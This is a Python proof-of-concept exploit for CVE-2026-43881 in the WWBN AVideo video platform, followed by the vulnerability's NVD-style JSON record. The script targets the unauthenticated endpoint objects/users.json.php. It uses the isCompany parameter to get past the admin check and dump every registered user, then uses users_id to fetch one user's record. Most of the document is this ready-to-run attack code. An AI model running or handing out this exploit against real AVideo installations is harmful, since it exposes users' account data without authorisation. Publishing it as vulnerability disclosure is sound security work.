CVE-2026-43881

import requests def exploit_avideo_info_disclosure(target_url): """ PoC for CVE-2026-43881: Information Disclosure in WWBN AVideo. This script demonstrates how to retrieve all users and specific user data without authentication. """ vulnerable_endpoint = f"{target_url}/objects/users.json.php" print(f"[*] Targeting: {target_url}") # Path 1: Retrieve all registered users using the isCompany parameter # This bypasses the admin check in User::getAllUsers() params_all_users = { 'isCompany': '1' # Sets $ignoreAdmin = true in the backend } try: print("\n[+] Attempting to dump all users...") response = requests.get(vulnerable_endpoint, params=params_all_users, timeout=10) if response.status_code == 200: print(f"[!] Success! Response Data:\n{response.json()}") else: print(f"[-] Failed. Status Code: {response.status_code}") except Exception as e: print(f"[-] Error during request: {e}") # Path 2: Retrieve a specific user (e.g., ID 1) using users_id parameter # This calls User::getUserFromID() without permission checks target_user_id = '1' params_single_user = { 'users_id': target_user_id } try: print(f"\n[+] Attempting to dump user ID {target_user_id}...") response = requests.get(vulnerable_endpoint, params=params_single_user, timeout=10) if response.status_code == 200: print(f"[!] Success! User Data:\n{response.json()}") else: print(f"[-] Failed. Status Code: {response.status_code}") except Exception as e: print(f"[-] Error during request: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://localhost/avideo" exploit_avideo_info_disclosure(target)

{"cve": {"id": "CVE-2026-43881", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:12.667", "lastModified": "2026-05-11T22:22:12.667", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, objects/users.json.php exposes two unauthenticated paths that disclose the full set of registered user accounts. The isCompany request parameter causes the handler to set $ignoreAdmin = true for any non-admin caller (including unauthenticated visitors), which defeats the admin-only guard inside User::getAllUsers()/User::getTotalUsers(). A second path accepts users_id and calls User::getUserFromID() directly with no permission check, producing a single-user oracle. Both paths return id, identification (display name), channel URL, photo, background, and status, plus the total account count. Commit d9cdc702481a626b15f814f6093f1e2a9c20d375 contains an updated fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/d9cdc702481a626b15f814f6093f1e2a9c20d375", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-6rvw-7p8v-mjfq", "source": "[email protected]"}]}}